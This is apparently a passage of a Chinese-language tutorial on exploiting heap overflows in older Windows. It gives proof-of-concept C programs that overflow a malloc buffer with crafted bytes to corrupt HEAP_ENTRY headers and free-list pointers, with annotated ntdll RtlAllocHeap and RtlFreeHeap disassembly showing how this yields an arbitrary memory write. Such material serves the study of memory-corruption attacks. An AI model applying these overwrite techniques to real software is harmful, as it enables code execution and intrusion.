main (int argc, char *argv[]) { char *buf1, *buf2; char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x03\x00\x05\x00\x00\x01\ x08\x00\x11\x11\x11\x11\x21\x21\x21\x21";
buf1 = (char*)malloc (32); /* 分配两块内存 */ memcpy (buf1, s, 32+16); /* 这里多复制16个字节 */
buf2 = (char*)malloc (16);
free (buf1); free (buf2);
return 0; }
现在如果在buf2分配空间之前,buf1的memcpy操作溢出,并且覆盖了 下一个空闲堆的管理结构(8bytes)|两个双链表指针(8bytes) 共16个字节的时候,就会造成buf2的RtlAllocHeap操作异常。原因看RtlAllocHeap的这段代码
001B:77FCC453 8901 MOV [ECX],EAX 001B:77FCC455 894804 MOV [EAX+04],ECX
此时ECX指向两个双链表指针(8bytes)的后一个指针(0x21212121),EAX指向前一个指针(0x11111111)。类似于format string溢出,可以写任意数据到任意地址,这种情况比较简单,前提是在buf2分配空间之前buf1有溢出的机会
2.利用RtlFreeHeap的方式一 这是ilsy提到的,看例子
main (int argc, char *argv[]) { char *buf1, *buf2; char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x03\x00\x05\x00\x00\x09";
buf1 = (char*)malloc (32); /* 分配两块内存 */ buf2 = (char*)malloc (16);
memcpy (buf1, s, 32+6); /* 这里多复制6个字节 */
free (buf1); free (buf2);
return 0; }
先看看8字节管理结构的定义(从windows源码中找到) typedef struct _HEAP_ENTRY {
// // This field gives the size of the current block in allocation // granularity units. (i.e. Size << HEAP_GRANULARITY_SHIFT // equals the size in bytes). // // Except if this is part of a virtual alloc block then this // value is the difference between the commit size in the virtual // alloc entry and the what the user asked for. //
// // This field gives the size of the previous block in allocation // granularity units. (i.e. PreviousSize << HEAP_GRANULARITY_SHIFT // equals the size of the previous block in bytes). //
USHORT PreviousSize;
// // This field contains the index into the segment that controls // the memory for this block. //
UCHAR SegmentIndex;
// // This field contains various flag bits associated with this block. // Currently these are: // // 0x01 - HEAP_ENTRY_BUSY // 0x02 - HEAP_ENTRY_EXTRA_PRESENT // 0x04 - HEAP_ENTRY_FILL_PATTERN // 0x08 - HEAP_ENTRY_VIRTUAL_ALLOC // 0x10 - HEAP_ENTRY_LAST_ENTRY // 0x20 - HEAP_ENTRY_SETTABLE_FLAG1 // 0x40 - HEAP_ENTRY_SETTABLE_FLAG2 // 0x80 - HEAP_ENTRY_SETTABLE_FLAG3 //
UCHAR Flags;
// // This field contains the number of unused bytes at the end of this // block that were not actually allocated. Used to compute exact // size requested prior to rounding requested size to allocation // granularity. Also used for tail checking purposes. //
UCHAR UnusedBytes;
// // Small (8 bit) tag indexes can go here. //
UCHAR SmallTagIndex;
#if defined(_WIN64) ULONGLONG Reserved1; #endif
注意这里的size是实际大小进行8字节对齐后除以8的值 可以看看flag的各个定义
关键点一 001B:77FCC829 8A4605 MOV AL,[ESI+05] //esi指向buf2的8字节管理结构的起始地址,al即flag 001B:77FCC82C A801 TEST AL,01 //flag值是否含有HEAP_ENTRY_BUSY 001B:77FCC82E 0F84A40E0000 JZ 77FCD6D8 //不含则跳转。这里不能跳 001B:77FCC834 F6C207 TEST DL,07 001B:77FCC837 0F859B0E0000 JNZ 77FCD6D8 001B:77FCC83D 807E0440 CMP BYTE PTR [ESI+04],40 //esi+4是否大于0x40 001B:77FCC841 0F83910E0000 JAE 77FCD6D8 //大于等于则跳转,这里不能跳 001B:77FCC847 834DFCFF OR DWORD PTR [EBP-04],-01 001B:77FCC84B A8E0 TEST AL,E0 //flag是否含有HEAP_ENTRY_SETTABLE_FLAG1 2 3 001B:77FCC84D 754A JNZ 77FCC899 //只要含有一个就跳,这里不重要 001B:77FCC84F 8B8F80050000 MOV ECX,[EDI+00000580] 001B:77FCC855 85C9 TEST ECX,ECX 001B:77FCC857 7440 JZ 77FCC899 //这里必然会跳
关键点二 001B:77FCC899 C745FC01000000 MOV DWORD PTR [EBP-04],00000001 001B:77FCC8A0 F6C301 TEST BL,01 001B:77FCC8A3 750F JNZ 77FCC8B4 //这里必然会跳 001B:77FCC8A5 FFB778050000 PUSH DWORD PTR [EDI+00000578] 001B:77FCC8AB E853C8FBFF CALL ntdll!RtlEnterCriticalSection 001B:77FCC8B0 C645D401 MOV BYTE PTR [EBP-2C],01 001B:77FCC8B4 F6460508 TEST BYTE PTR [ESI+05],08 //flag是否含HEAP_ENTRY_VIRTUAL_ALLOC 001B:77FCC8B8 0F858BF2FFFF JNZ 77FCBB49 //含有则跳,这里要跳
关键点三 001B:77FCBB49 83C6E8 ADD ESI,-18 //ilsy说在不同的windows版本上这个0x18的是不同的 001B:77FCBB4C 89759C MOV [EBP-64],ESI 001B:77FCBB4F 8B06 MOV EAX,[ESI] 001B:77FCBB51 894598 MOV [EBP-68],EAX 001B:77FCBB54 8B7604 MOV ESI,[ESI+04] 001B:77FCBB57 897594 MOV [EBP-6C],ESI 001B:77FCBB5A 8906 MOV [ESI],EAX //这里会操作异常